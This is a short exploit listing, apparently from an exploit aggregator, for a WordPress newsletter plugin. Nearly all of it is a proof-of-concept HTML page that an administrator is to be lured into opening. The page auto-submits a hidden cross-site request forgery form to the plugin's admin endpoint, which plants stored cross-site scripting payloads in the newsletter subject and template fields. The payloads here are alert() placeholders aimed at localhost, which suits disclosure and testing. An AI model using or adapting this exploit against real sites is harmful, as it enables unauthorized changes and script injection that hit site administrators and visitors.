Share
## https://sploitus.com/exploit?id=WPEX-ID:FC33C79D-AD24-4D55-973A-25280995A2AB
Make an admin open an HTML file containing:
```
<body onload="document.forms[0].submit()">
<form action="http://localhost:10019/wp-admin/admin.php?page=enl-add-new" method="post">
<input type="hidden" name="action" value="create" />
<input type="hidden" name="number" value="5" />
<label for="name">Name:</label>
<input type="text" id="name" name="name" value="CSRF"/>
<input type="hidden" name="subject" value='"><script>alert(1)</script>' />
<input type="hidden" name="header" value="CSRF!" />
<input type="hidden" name="template" value='</textarea><script>alert(2)</script>' />
<input type="hidden" name="footer" value="CSRF" />
<input type="hidden" name="campaign" value="Save" />
<input type="submit" value="Submit" />
</form>
</body>
```